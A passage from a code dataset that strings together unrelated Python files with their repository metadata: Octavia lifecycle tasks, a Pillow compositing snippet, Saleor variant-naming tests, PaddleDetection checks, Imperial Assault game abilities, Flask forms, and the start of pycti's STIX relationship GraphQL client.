def revert(self, member, listeners, loadbalancer, pool_id, *args,
**kwargs):
self.task_utils.mark_member_prov_status_error(
member[constants.MEMBER_ID])
for listener in listeners:
self.task_utils.mark_listener_prov_status_active(
listener[constants.LISTENER_ID])
self.task_utils.mark_pool_prov_status_active(pool_id)
self.task_utils.mark_loadbalancer_prov_status_active(
loadbalancer[constants.LOADBALANCER_ID])
class MembersToErrorOnRevertTask(BaseLifecycleTask):
"""Task to set members to ERROR on revert."""
def execute(self, members, listeners, loadbalancer, pool_id):
pass
def revert(self, members, listeners, loadbalancer, pool_id, *args,
**kwargs):
for m in members:
self.task_utils.mark_member_prov_status_error(
m[constants.MEMBER_ID])
for listener in listeners:
self.task_utils.mark_listener_prov_status_active(
listener[constants.LISTENER_ID])
self.task_utils.mark_pool_prov_status_active(pool_id)
self.task_utils.mark_loadbalancer_prov_status_active(
loadbalancer[constants.LOADBALANCER_ID])
class PoolToErrorOnRevertTask(BaseLifecycleTask):
"""Task to set a pool to ERROR on revert."""
def execute(self, pool_id, listeners, loadbalancer):
pass
def revert(self, pool_id, listeners, loadbalancer, *args, **kwargs):
self.task_utils.mark_pool_prov_status_error(pool_id)
self.task_utils.mark_loadbalancer_prov_status_active(
loadbalancer[constants.LOADBALANCER_ID])
for listener in listeners:
self.task_utils.mark_listener_prov_status_active(
listener[constants.LISTENER_ID])
| 35.809045
| 78
| 0.706147
|
4a0a14b74a646966a85dd8cb054088bedb640a9b
| 1,495
|
py
|
Python
|
notebook/pillow_composite.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 174
|
2018-05-30T21:14:50.000Z
|
2022-03-25T07:59:37.000Z
|
notebook/pillow_composite.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 5
|
2019-08-10T03:22:02.000Z
|
2021-07-12T20:31:17.000Z
|
notebook/pillow_composite.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 53
|
2018-04-27T05:26:35.000Z
|
2022-03-25T07:59:37.000Z
|
from PIL import Image, ImageDraw, ImageFilter
im1 = Image.open('data/src/lena.jpg')
im2 = Image.open('data/src/rocket.jpg').resize(im1.size)
im2.save('data/src/rocket_resize.jpg')
# 
# 
mask = Image.new("L", im1.size, 128)
im = Image.composite(im1, im2, mask)
# im = Image.blend(im1, im2, 0.5)
im.save('data/dst/pillow_composite_solid.jpg', quality=95)
# 
mask = Image.new("L", im1.size, 0)
draw = ImageDraw.Draw(mask)
draw.ellipse((140, 50, 260, 170), fill=255)
im = Image.composite(im1, im2, mask)
im.save('data/dst/pillow_composite_circle.jpg', quality=95)
# 
mask_blur = mask.filter(ImageFilter.GaussianBlur(10))
im = Image.composite(im1, im2, mask_blur)
im.save('data/dst/pillow_composite_circle_blur.jpg', quality=95)
# 
mask = Image.open('data/src/horse.png').convert('L').resize(im1.size)
im = Image.composite(im1, im2, mask)
im.save('data/dst/pillow_composite_horse.jpg', quality=95)
# 
mask = Image.open('data/src/gradation_h.jpg').convert('L').resize(im1.size)
im = Image.composite(im1, im2, mask)
im.save('data/dst/pillow_composite_gradation.jpg', quality=95)
# 
| 31.145833
| 76
| 0.751839
|
4a0a15c30b5fa16a23c26288a535b29fea9aa1f6
| 8,936
|
py
|
Python
|
saleor/product/tests/test_generate_and_set_variant_name.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 15,337
|
2015-01-12T02:11:52.000Z
|
2021-10-05T19:19:29.000Z
|
saleor/product/tests/test_generate_and_set_variant_name.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 7,486
|
2015-02-11T10:52:13.000Z
|
2021-10-06T09:37:15.000Z
|
saleor/product/tests/test_generate_and_set_variant_name.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 5,864
|
2015-01-16T14:52:54.000Z
|
2021-10-05T23:01:15.000Z
|
from decimal import Decimal
from unittest.mock import MagicMock, Mock
import pytest
from ...attribute import AttributeInputType
from ...attribute.models import AttributeValue
from ...attribute.utils import associate_attribute_values_to_instance
from ...product import ProductTypeKind
from ...product.models import ProductVariantChannelListing
from ..models import Product, ProductType, ProductVariant
from ..tasks import _update_variants_names
from ..utils.variants import generate_and_set_variant_name
@pytest.fixture()
def variant_with_no_attributes(category, channel_USD):
"""Create a variant having no attributes, the same for the parent product."""
product_type = ProductType.objects.create(
name="Test product type",
has_variants=True,
is_shipping_required=True,
kind=ProductTypeKind.NORMAL,
)
product = Product.objects.create(
name="Test product",
product_type=product_type,
category=category,
)
variant = ProductVariant.objects.create(product=product, sku="123")
ProductVariantChannelListing.objects.create(
variant=variant,
channel=channel_USD,
cost_price_amount=Decimal(1),
price_amount=Decimal(10),
currency=channel_USD.currency_code,
)
return variant
def test_generate_and_set_variant_name_different_attributes(
variant_with_no_attributes, color_attribute_without_values, size_attribute
):
"""Test the name generation from a given variant containing multiple attributes and
different input types (dropdown and multiselect).
"""
variant = variant_with_no_attributes
color_attribute = color_attribute_without_values
# Assign the attributes to the product type
variant.product.product_type.variant_attributes.add(
size_attribute, through_defaults={"variant_selection": True}
)
variant.product.product_type.variant_attributes.add(color_attribute)
# Set the color attribute to a multi-value attribute
color_attribute.input_type = AttributeInputType.MULTISELECT
color_attribute.save(update_fields=["input_type"])
# Create colors
colors = AttributeValue.objects.bulk_create(
[
AttributeValue(attribute=color_attribute, name="Yellow", slug="yellow"),
AttributeValue(attribute=color_attribute, name="Blue", slug="blue"),
AttributeValue(attribute=color_attribute, name="Red", slug="red"),
]
)
# Retrieve the size attribute value "Big"
size = size_attribute.values.get(slug="big")
# Associate the colors and size to variant attributes
associate_attribute_values_to_instance(variant, color_attribute, *tuple(colors))
associate_attribute_values_to_instance(variant, size_attribute, size)
# Generate the variant name from the attributes
generate_and_set_variant_name(variant, variant.sku)
variant.refresh_from_db()
assert variant.name == "Big"
def test_generate_and_set_variant_name_only_variant_selection_attributes(
variant_with_no_attributes, color_attribute_without_values, size_attribute
):
"""Test the name generation for a given variant containing multiple attributes
with input types allowed in variant selection.
"""
variant = variant_with_no_attributes
color_attribute = color_attribute_without_values
# Assign the attributes to the product type
variant.product.product_type.variant_attributes.set(
(color_attribute, size_attribute), through_defaults={"variant_selection": True}
)
# Create values
colors = AttributeValue.objects.bulk_create(
[
AttributeValue(
attribute=color_attribute, name="Yellow", slug="yellow", sort_order=1
),
AttributeValue(
attribute=color_attribute, name="Blue", slug="blue", sort_order=2
),
AttributeValue(
attribute=color_attribute, name="Red", slug="red", sort_order=3
),
]
)
# Retrieve the size attribute value "Big"
size = size_attribute.values.get(slug="big")
size.sort_order = 4
size.save(update_fields=["sort_order"])
# Associate the colors and size to variant attributes
associate_attribute_values_to_instance(variant, color_attribute, *tuple(colors))
associate_attribute_values_to_instance(variant, size_attribute, size)
# Generate the variant name from the attributes
generate_and_set_variant_name(variant, variant.sku)
variant.refresh_from_db()
assert variant.name == "Big / Yellow, Blue, Red"
def test_generate_and_set_variant_name_only_not_variant_selection_attributes(
variant_with_no_attributes, color_attribute_without_values, file_attribute
):
"""Test the name generation for a given variant containing multiple attributes
with input types not allowed in variant selection.
"""
variant = variant_with_no_attributes
color_attribute = color_attribute_without_values
# Assign the attributes to the product type
variant.product.product_type.variant_attributes.set(
(color_attribute, file_attribute)
)
# Set the color attribute to a multi-value attribute
color_attribute.input_type = AttributeInputType.MULTISELECT
color_attribute.save(update_fields=["input_type"])
# Create values
values = AttributeValue.objects.bulk_create(
[
AttributeValue(attribute=color_attribute, name="Yellow", slug="yellow"),
AttributeValue(attribute=color_attribute, name="Blue", slug="blue"),
AttributeValue(
attribute=file_attribute,
name="test_file_3.txt",
slug="test_file3txt",
file_url="http://mirumee.com/test_media/test_file3.txt",
content_type="text/plain",
),
]
)
# Associate the colors and size to variant attributes
associate_attribute_values_to_instance(variant, color_attribute, *values[:2])
associate_attribute_values_to_instance(variant, file_attribute, values[-1])
# Generate the variant name from the attributes
generate_and_set_variant_name(variant, variant.sku)
variant.refresh_from_db()
assert variant.name == variant.sku
def test_generate_name_from_values_empty(variant_with_no_attributes):
"""Ensure generate a variant name from a variant without any attributes assigned
returns an empty string."""
variant = variant_with_no_attributes
generate_and_set_variant_name(variant, variant.sku)
variant.refresh_from_db()
assert variant.name == variant.sku
def test_product_type_update_changes_variant_name(product):
new_name = "test_name"
product_variant = product.variants.first()
assert not product_variant.name == new_name
attribute = product.product_type.variant_attributes.first()
attribute_value = attribute.values.first()
attribute_value.name = new_name
attribute_value.save()
_update_variants_names(product.product_type, [attribute])
product_variant.refresh_from_db()
assert product_variant.name == new_name
def test_only_not_variant_selection_attr_left_variant_name_change_to_sku(product):
new_name = "test_name"
product_variant = product.variants.first()
assert not product_variant.name == new_name
attribute = product.product_type.variant_attributes.first()
variant_attribute = attribute.attributevariant.get()
variant_attribute.variant_selection = False
variant_attribute.save(update_fields=["variant_selection"])
attribute.input_type = AttributeInputType.MULTISELECT
attribute.save(update_fields=["input_type"])
_update_variants_names(product.product_type, [attribute])
product_variant.refresh_from_db()
assert product_variant.name == product_variant.sku
def test_update_variants_changed_does_nothing_with_no_attributes():
product_type = MagicMock(spec=ProductType)
product_type.variant_attributes.all = Mock(return_value=[])
saved_attributes = []
# FIXME: This method no longer returns any value
assert _update_variants_names(product_type, saved_attributes) is None
def test_only_not_variant_selection_attr_left_variant_name_change_to_global_id(product):
new_name = "test_name"
product_variant = product.variants.first()
assert not product_variant.name == new_name
product_variant.sku = None
product_variant.save()
attribute = product.product_type.variant_attributes.first()
attribute.input_type = AttributeInputType.MULTISELECT
variant_attribute = attribute.attributevariant.get()
variant_attribute.variant_selection = False
variant_attribute.save(update_fields=["variant_selection"])
attribute.save(update_fields=["input_type"])
_update_variants_names(product.product_type, [attribute])
product_variant.refresh_from_db()
assert product_variant.name == product_variant.get_global_id()
| 38.188034
| 88
| 0.743733
|
4a0a17638f49bf892dcf0ff25cf0d2a63c5404fd
| 3,465
|
py
|
Python
|
paddlers/models/ppdet/utils/check.py
|
huilin16/PaddleRS
|
ca0d6223d8e56cd3bd3cbd3a033c89f1718ce26a
|
[
"Apache-2.0"
] | 40
|
2022-02-28T02:07:28.000Z
|
2022-03-31T09:54:29.000Z
|
paddlers/models/ppdet/utils/check.py
|
wondering516/PaddleRS
|
b6f7033f3c0ca7bc6952456c0a0f53eef6c1c07f
|
[
"Apache-2.0"
] | 5
|
2022-03-15T12:13:33.000Z
|
2022-03-31T15:54:08.000Z
|
paddlers/models/ppdet/utils/check.py
|
wondering516/PaddleRS
|
b6f7033f3c0ca7bc6952456c0a0f53eef6c1c07f
|
[
"Apache-2.0"
] | 20
|
2022-02-28T02:07:31.000Z
|
2022-03-31T11:40:40.000Z
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import paddle
import six
import paddle.version as fluid_version
from .logger import setup_logger
logger = setup_logger(__name__)
__all__ = ['check_gpu', 'check_npu', 'check_version', 'check_config']
def check_npu(use_npu):
"""
Log error and exit when set use_npu=true in paddlepaddle
cpu/gpu/xpu version.
"""
err = "Config use_npu cannot be set as true while you are " \
"using paddlepaddle cpu/gpu/xpu version ! \nPlease try: \n" \
"\t1. Install paddlepaddle-npu to run model on NPU \n" \
"\t2. Set use_npu as false in config file to run " \
"model on CPU/GPU/XPU"
try:
if use_npu and not paddle.is_compiled_with_npu():
logger.error(err)
sys.exit(1)
except Exception as e:
pass
def check_gpu(use_gpu):
"""
Log error and exit when set use_gpu=true in paddlepaddle
cpu version.
"""
err = "Config use_gpu cannot be set as true while you are " \
"using paddlepaddle cpu version ! \nPlease try: \n" \
"\t1. Install paddlepaddle-gpu to run model on GPU \n" \
"\t2. Set use_gpu as false in config file to run " \
"model on CPU"
try:
if use_gpu and not paddle.is_compiled_with_cuda():
logger.error(err)
sys.exit(1)
except Exception as e:
pass
def check_version(version='2.0'):
"""
Log error and exit when the installed version of paddlepaddle is
not satisfied.
"""
err = "PaddlePaddle version {} or higher is required, " \
"or a suitable develop version is satisfied as well. \n" \
"Please make sure the version is good with your code.".format(version)
version_installed = [
fluid_version.major, fluid_version.minor, fluid_version.patch,
fluid_version.rc
]
if version_installed == ['0', '0', '0', '0']:
return
version_split = version.split('.')
length = min(len(version_installed), len(version_split))
for i in six.moves.range(length):
if version_installed[i] > version_split[i]:
return
if version_installed[i] < version_split[i]:
raise Exception(err)
def check_config(cfg):
"""
Check the correctness of the configuration file. Log error and exit
when Config is not compliant.
"""
err = "'{}' not specified in config file. Please set it in config file."
check_list = ['architecture', 'num_classes']
try:
for var in check_list:
if not var in cfg:
logger.error(err.format(var))
sys.exit(1)
except Exception as e:
pass
if 'log_iter' not in cfg:
cfg.log_iter = 20
return cfg
| 30.663717
| 80
| 0.649928
|
4a0a177b70ad20b5b9965b94c940d3270bd4bfaf
| 10,137
|
py
|
Python
|
src/swia/model/abilities.py
|
valeriodigregorio/swia-skirmish-calculator
|
7020e0e57b65c5606762b1f0781d0ec00a612b2e
|
[
"Apache-2.0"
] | null | null | null |
src/swia/model/abilities.py
|
valeriodigregorio/swia-skirmish-calculator
|
7020e0e57b65c5606762b1f0781d0ec00a612b2e
|
[
"Apache-2.0"
] | 4
|
2018-05-21T21:22:25.000Z
|
2018-05-21T21:28:13.000Z
|
src/swia/model/abilities.py
|
valeriodigregorio/swia-skirmish-calculator
|
7020e0e57b65c5606762b1f0781d0ec00a612b2e
|
[
"Apache-2.0"
] | null | null | null |
"""
abilities
Abilities module for "Star Wars: Imperial Assault"
"""
import _pickle as pickle
from swia.engine.actions import Attack, Roll
__author__ = "Valerio Di Gregorio"
__copyright__ = "Copyright 2018, Valerio Di Gregorio"
__date__ = '2018-04-02'
class Ability:
@staticmethod
def create(data):
"""
Create an ability from data.
:param data: Data of the ability.
:return: An instance of the ability object.
"""
def create_complex_ability(d):
t = {
'Fly-By': FlyByAbility,
}.get(d['name'], None)
if t is None:
raise ValueError(f"Unsupported ability name '{d['name']}'.")
return t(d)
ability_type = {
'surge': SurgeAbility,
'reroll': RerollAbility,
'conversion': ConversionAbility,
'complex': create_complex_ability,
}.get(data['type'], None)
if ability_type is None:
raise ValueError(f"Unsupported ability type '{data['type']}'.")
return ability_type(data)
def __init__(self, json):
"""
Create an ability
:param json: Data model that describes the ability in JSON.
"""
self._type = json.get('type', None)
if self._type is None:
raise ValueError(self._type)
self._model = json
self.effects = self._model.get('effects', {})
for key in ['accuracy', 'damage', 'surge', 'pierce', 'block', 'evade', 'dodge']:
self.effects[key] = self.effects.get(key, 0)
@property
def type(self):
return self._model['type']
@property
def trigger(self):
return self._model['trigger']
@property
def action(self):
return self._model['action']
def can_apply(self, action):
"""
Check if the ability is applicable.
:param action: The action where the ability is performed.
:return: True if the ability can be applied. False otherwise.
"""
raise NotImplementedError()
def apply(self, action):
"""
Apply the ability to the action.
:param action: The action where the ability is performed.
"""
raise NotImplementedError()
class SurgeAbility(Ability):
def __init__(self, json):
"""
Create a surge ability
:param json: Data model that describes the ability in JSON.
"""
ability_type = json['type']
if ability_type != 'surge':
raise ValueError(ability_type)
super().__init__(json)
@property
def cost(self):
"""
Retrieve the cost of the ability.
:return: Cost of the ability.
"""
return self._model.get('cost', 0)
def can_apply(self, attack):
"""
Check if the ability is applicable.
:param attack: The attack where the ability is performed.
:return: True if the ability can be applied. False otherwise.
"""
if type(attack) is not Attack:
return False
return attack.surge_left >= self.cost
def apply(self, attack):
"""
Apply the ability to the action.
:param attack: The attack where the ability is performed.
"""
if self.can_apply(attack):
for key in ['accuracy', 'damage', 'surge', 'pierce', 'block', 'evade', 'dodge']:
setattr(attack, key, getattr(attack, key) + self.effects[key])
return True
return False
class RerollAbility(Ability):
def __init__(self, json):
"""
Create a reroll ability
:param json: Data model that describes the ability in JSON.
"""
ability_type = json['type']
if ability_type != 'reroll':
raise ValueError(ability_type)
if json.get('attack', 0) + json.get('defense', 0) == 0:
raise ValueError(f"Reroll ability can't reroll zero dice.")
super().__init__(json)
@property
def attack(self):
return self._model.get('attack', 0)
@property
def defense(self):
return self._model.get('defense', 0)
def can_apply(self, attack):
"""
Check if the ability is applicable.
:param attack: The attack where the ability is performed.
:return: True if the ability can be applied. False otherwise.
"""
return True
def apply(self, attack):
"""
Apply the ability to the action.
:param attack: The attack where the ability is performed.
"""
for reroll_type, n in [('attack', self.attack), ('defense', self.defense)]:
if reroll_type in attack.rerolls_priority:
priority = attack.rerolls_priority[reroll_type]
for k, dmg in priority if reroll_type in self.action else reversed(priority):
if n == 0:
return True
roll = attack.rolls[reroll_type][k]
if self.can_apply(attack) and (roll is not None) and not roll.rerolled:
if reroll_type in self.action:
if dmg / 6 < attack.no_rerolls_total_damage:
return True
else:
if dmg / 6 > attack.no_rerolls_total_damage:
return True
roll.revert(attack)
roll.reroll()
roll.apply(attack)
n -= 1
return False
class ConversionAbility(Ability):
def __init__(self, json):
"""
Create a conversion ability
:param json: Data model that describes the ability in JSON.
"""
ability_type = json['type']
if ability_type != 'conversion':
raise ValueError(ability_type)
self.from_attribute = json['from']
self.to_attribute = json['to']
self.min_amount = json.get('min', None)
self.max_amount = json.get('max', None)
self._skip = False
super().__init__(json)
def get_conversion_range(self, attack):
"""
Retrieve the range of units that can be converted during this attack.
:param attack: The attack where the conversion is performed.
:return: The range of units that can be converted as a tuple (min, max).
None range if conversion can't be applied.
"""
n = getattr(attack, self.from_attribute['attribute'])
if n < 0:
n = 0
mx = self.max_amount if self.max_amount is not None else n
mn = self.min_amount if self.min_amount is not None else mx
if n < mx:
mx = n
if n < mn:
return None
return mn, mx
def can_apply(self, attack):
"""
Check if the ability is applicable.
:param attack: The attack where the ability is performed.
:return: True if the ability can be applied. False otherwise.
"""
if self._skip:
return False
n = getattr(attack, self.from_attribute['attribute'], 0)
r = self.get_conversion_range(attack)
if r is None:
return False
c = self.from_attribute.get('amount', 0)
if c == 0:
return True
return n > r[0]
def _do_apply(self, attack, n):
if n > 0:
c = self.from_attribute.get('amount', 0)
k = 0 if c == 0 else n // c * c
if k != 0:
setattr(attack, self.from_attribute['attribute'],
getattr(attack, self.from_attribute['attribute'], 0) - k)
c = self.to_attribute.get('amount', 0)
k = 0 if c == 0 else n // c * c
if k != 0:
setattr(attack, self.to_attribute['attribute'],
getattr(attack, self.to_attribute['attribute'], 0) + k)
def apply(self, attack):
"""
Apply the ability to the action.
:param attack: The attack where the ability is performed.
"""
def simulate_conversion(rng):
total = {}
self._skip = True
dump = pickle.dumps(attack, -1)
for i in rng:
a = pickle.loads(dump)
self._do_apply(a, i)
a.simulate()
total[i] = a.total_damage
self._skip = False
return sorted(total.items(), key=lambda t: (t[1], t[0]), reverse=True)
if self._skip:
return False
r = self.get_conversion_range(attack)
if r is None:
return False
mn, mx = r
n = mx
if mn != mx:
priority = simulate_conversion(range(mn, mx + 1))
n = {
'attack': priority[0][0],
'defense': priority[-1][0],
}.get(self.action[0], None)
if n is None:
raise AttributeError(self.action[0])
self._do_apply(attack, n)
return True
class FlyByAbility(Ability):
def __init__(self, json):
"""
Create the Fly-By ability
:param json: Data model that describes the ability in JSON.
"""
if json['type'] != 'custom':
raise ValueError(json['type'])
if json['name'] != 'Fly-By':
raise ValueError(json['name'])
super().__init__(json)
def can_apply(self, attack):
"""
Check if the ability is applicable.
:param attack: The attack where the ability is performed.
:return: True if the ability can be applied. False otherwise.
"""
return attack.context.attack_range <= 2
def apply(self, attack):
"""
Apply the ability to the action.
:param attack: The attack where the ability is performed.
"""
if self.can_apply(attack):
roll = Roll('blue')
roll.apply(attack)
attack.rolls['attack'].append(roll)
return True
return False
| 32.180952
| 93
| 0.544638
|
4a0a180a813c9fc6a4e3e968be369956fcead382
| 710
|
py
|
Python
|
instructors/course-2015/flask-cont/examples/in_class/forms.py
|
mgadagin/PythonClass
|
70b370362d75720b3fb0e1d6cc8158f9445e9708
|
[
"MIT"
] | 46
|
2017-09-27T20:19:36.000Z
|
2020-12-08T10:07:19.000Z
|
instructors/course-2015/flask-cont/examples/in_class/forms.py
|
mgadagin/PythonClass
|
70b370362d75720b3fb0e1d6cc8158f9445e9708
|
[
"MIT"
] | 6
|
2018-01-09T08:07:37.000Z
|
2020-09-07T12:25:13.000Z
|
instructors/course-2015/flask-cont/examples/in_class/forms.py
|
mgadagin/PythonClass
|
70b370362d75720b3fb0e1d6cc8158f9445e9708
|
[
"MIT"
] | 18
|
2017-10-10T02:06:51.000Z
|
2019-12-01T10:18:13.000Z
|
from flask_wtf import Form
from wtforms import StringField, PasswordField, TextAreaField
from wtforms.fields.html5 import EmailField, URLField
from wtforms.validators import DataRequired, URL, Optional
class HackNewsUserForm(Form):
name = StringField('name', validators=[DataRequired()])
password = PasswordField('password', validators=[DataRequired()])
email = EmailField('email', validators=[DataRequired()])
#note there is an Email Validator as well
class HackNewsPostForm(Form):
title = StringField('title', validators=[DataRequired()])
url = URLField('url', validators=[URL(message="link to post"), DataRequired()])
text = TextAreaField('text', validators=[Optional()])
| 35.5
| 83
| 0.743662
|
4a0a1864ab776664c0eea0b0c90c910a1df36011
| 119
|
py
|
Python
|
51177.py
|
shaurya10898/CS-177
|
ab72c24a2e9cc96fe9e99db4b80ff12e4c8bc5f9
|
[
"MIT"
] | null | null | null |
51177.py
|
shaurya10898/CS-177
|
ab72c24a2e9cc96fe9e99db4b80ff12e4c8bc5f9
|
[
"MIT"
] | null | null | null |
51177.py
|
shaurya10898/CS-177
|
ab72c24a2e9cc96fe9e99db4b80ff12e4c8bc5f9
|
[
"MIT"
] | null | null | null |
n = int(input("Enter a positive number:"))
total = 0
for k in range (1, n, 1):
total += k*k*k
print(total)
| 17
| 42
| 0.563025
|
4a0a18b349aa3737f4aa144c8d407ccf5f6ef031
| 39,308
|
py
|
Python
|
pycti/entities/opencti_stix_core_relationship.py
|
fscc-samiR/client-python
|
7c6061c1c96b8a1a9b9b0618ce742549c2949c56
|
[
"Apache-2.0"
] | null | null | null |
pycti/entities/opencti_stix_core_relationship.py
|
fscc-samiR/client-python
|
7c6061c1c96b8a1a9b9b0618ce742549c2949c56
|
[
"Apache-2.0"
] | null | null | null |
pycti/entities/opencti_stix_core_relationship.py
|
fscc-samiR/client-python
|
7c6061c1c96b8a1a9b9b0618ce742549c2949c56
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
class StixCoreRelationship:
def __init__(self, opencti):
self.opencti = opencti
self.properties = """
id
entity_type
parent_types
spec_version
created_at
updated_at
standard_id
relationship_type
description
start_time
stop_time
revoked
confidence
lang
created
modified
createdBy {
... on Identity {
id
standard_id
entity_type
parent_types
spec_version
identity_class
name
description
roles
contact_information
x_opencti_aliases
created
modified
objectLabel {
edges {
node {
id
value
color
}
}
}
}
... on Organization {
x_opencti_organization_type
x_opencti_reliability
}
... on Individual {
x_opencti_firstname
x_opencti_lastname
}
}
objectMarking {
edges {
node {
id
standard_id
entity_type
definition_type
definition
created
modified
x_opencti_order
x_opencti_color
}
}
}
objectLabel {
edges {
node {
id
value
color
}
}
}
externalReferences {
edges {
node {
id
standard_id
entity_type
source_name
description
url
hash
external_id
created
modified
importFiles {
edges {
node {
id
name
size
metaData {
mimetype
version
}
}
}
}
}
}
}
from {
... on BasicObject {
id
entity_type
parent_types
}
... on BasicRelationship {
id
entity_type
parent_types
}
... on StixObject {
standard_id
spec_version
created_at
updated_at
}
... on AttackPattern {
name
}
... on Campaign {
name
}
... on CourseOfAction {
name
}
... on Individual {
name
}
... on Organization {
name
}
... on Sector {
name
}
... on System {
name
}
... on Indicator {
name
}
... on Infrastructure {
name
}
... on IntrusionSet {
name
}
... on Position {
name
}
... on City {
name
}
... on Country {
name
}
... on Region {
name
}
... on Malware {
name
}
... on ThreatActor {
name
}
... on Tool {
name
}
... on Vulnerability {
name
}
... on Incident {
name
}
... on StixCyberObservable {
observable_value
}
... on StixCoreRelationship {
standard_id
spec_version
created_at
updated_at
}
}
to {
... on BasicObject {
id
entity_type
parent_types
}
... on BasicRelationship {
id
entity_type
parent_types
}
... on StixObject {
standard_id
spec_version
created_at
updated_at
}
... on AttackPattern {
name
}
... on Campaign {
name
}
... on CourseOfAction {
name
}
... on Individual {
name
}
... on Organization {
name
}
... on Sector {
name
}
... on System {
name
}
... on Indicator {
name
}
... on Infrastructure {
name
}
... on IntrusionSet {
name
}
... on Position {
name
}
... on City {
name
}
... on Country {
name
}
... on Region {
name
}
... on Malware {
name
}
... on ThreatActor {
name
}
... on Tool {
name
}
... on Vulnerability {
name
}
... on Incident {
name
}
... on StixCyberObservable {
observable_value
}
... on StixCoreRelationship {
standard_id
spec_version
created_at
updated_at
}
}
"""
"""
List stix_core_relationship objects
:param fromId: the id of the source entity of the relation
:param toId: the id of the target entity of the relation
:param relationship_type: the relation type
:param startTimeStart: the start_time date start filter
:param startTimeStop: the start_time date stop filter
:param stopTimeStart: the stop_time date start filter
:param stopTimeStop: the stop_time date stop filter
:param first: return the first n rows from the after ID (or the beginning if not set)
:param after: ID of the first row for pagination
:return List of stix_core_relationship objects
"""
def list(self, **kwargs):
element_id = kwargs.get("elementId", None)
from_id = kwargs.get("fromId", None)
from_types = kwargs.get("fromTypes", None)
to_id = kwargs.get("toId", None)
to_types = kwargs.get("toTypes", None)
relationship_type = kwargs.get("relationship_type", None)
start_time_start = kwargs.get("startTimeStart", None)
start_time_stop = kwargs.get("startTimeStop", None)
stop_time_start = kwargs.get("stopTimeStart", None)
stop_time_stop = kwargs.get("stopTimeStop", None)
filters = kwargs.get("filters", [])
first = kwargs.get("first", 100)
after = kwargs.get("after", None)
order_by = kwargs.get("orderBy", None)
order_mode = kwargs.get("orderMode", None)
custom_attributes = kwargs.get("customAttributes", None)
get_all = kwargs.get("getAll", False)
with_pagination = kwargs.get("withPagination", False)
if get_all:
first = 100
self.opencti.log(
"info",
"Listing stix_core_relationships with {type: "
+ str(relationship_type)
+ ", from_id: "
+ str(from_id)
+ ", to_id: "
+ str(to_id)
+ "}",
)
query = (
"""
query StixCoreRelationships($elementId: String, $fromId: String, $fromTypes: [String], $toId: String, $toTypes: [String], $relationship_type: [String], $startTimeStart: DateTime, $startTimeStop: DateTime, $stopTimeStart: DateTime, $stopTimeStop: DateTime, $filters: [StixCoreRelationshipsFiltering], $first: Int, $after: ID, $orderBy: StixCoreRelationshipsOrdering, $orderMode: OrderingMode) {
stixCoreRelationships(elementId: $elementId, fromId: $fromId, fromTypes: $fromTypes, toId: $toId, toTypes: $toTypes, relationship_type: $relationship_type, startTimeStart: $startTimeStart, startTimeStop: $startTimeStop, stopTimeStart: $stopTimeStart, stopTimeStop: $stopTimeStop, filters: $filters, first: $first, after: $after, orderBy: $orderBy, orderMode: $orderMode) {
edges {
node {
"""
+ (custom_attributes if custom_attributes is not None else self.properties)
+ """
}
}
pageInfo {
startCursor
endCursor
hasNextPage
hasPreviousPage
globalCount
}
}
}
"""
)
result = self.opencti.query(
query,
{
"elementId": element_id,
"fromId": from_id,
"fromTypes": from_types,
"toId": to_id,
"toTypes": to_types,
"relationship_type": relationship_type,
"startTimeStart": start_time_start,
"startTimeStop": start_time_stop,
"stopTimeStart": stop_time_start,
"stopTimeStop": stop_time_stop,
"filters": filters,
"first": first,
"after": after,
"orderBy": order_by,
"orderMode": order_mode,
},
)
if get_all:
final_data = []
data = self.opencti.process_multiple(
result["data"]["stixCoreRelationships"]
)
final_data = final_data + data
while result["data"]["stixCoreRelationships"]["pageInfo"]["hasNextPage"]:
after = result["data"]["stixCoreRelationships"]["pageInfo"]["endCursor"]
self.opencti.log("info", "Listing StixCoreRelationships after " + after)
result = self.opencti.query(
query,
{
"elementId": element_id,
"fromId": from_id,
"fromTypes": from_types,
"toId": to_id,
"toTypes": to_types,
"relationship_type": relationship_type,
"startTimeStart": start_time_start,
"startTimeStop": start_time_stop,
"stopTimeStart": stop_time_start,
"stopTimeStop": stop_time_stop,
"filters": filters,
"first": first,
"after": after,
"orderBy": order_by,
"orderMode": order_mode,
},
)
data = self.opencti.process_multiple(
result["data"]["stixCoreRelationships"]
)
final_data = final_data + data
return final_data
else:
return self.opencti.process_multiple(
result["data"]["stixCoreRelationships"], with_pagination
)
"""
Read a stix_core_relationship object
:param id: the id of the stix_core_relationship
:param elementId: the id of the entity of the relation
:param fromId: the id of the source entity of the relation
:param toId: the id of the target entity of the relation
:param relationship_type: the relation type
:param startTimeStart: the start_time date start filter
:param startTimeStop: the start_time date stop filter
:param stopTimeStart: the stop_time date start filter
:param stopTimeStop: the stop_time date stop filter
:return stix_core_relationship object
"""
def read(self, **kwargs):
id = kwargs.get("id", None)
element_id = kwargs.get("elementId", None)
from_id = kwargs.get("fromId", None)
to_id = kwargs.get("toId", None)
relationship_type = kwargs.get("relationship_type", None)
start_time_start = kwargs.get("startTimeStart", None)
start_time_stop = kwargs.get("startTimeStop", None)
stop_time_start = kwargs.get("stopTimeStart", None)
stop_time_stop = kwargs.get("stopTimeStop", None)
custom_attributes = kwargs.get("customAttributes", None)
if id is not None:
self.opencti.log("info", "Reading stix_core_relationship {" + id + "}.")
query = (
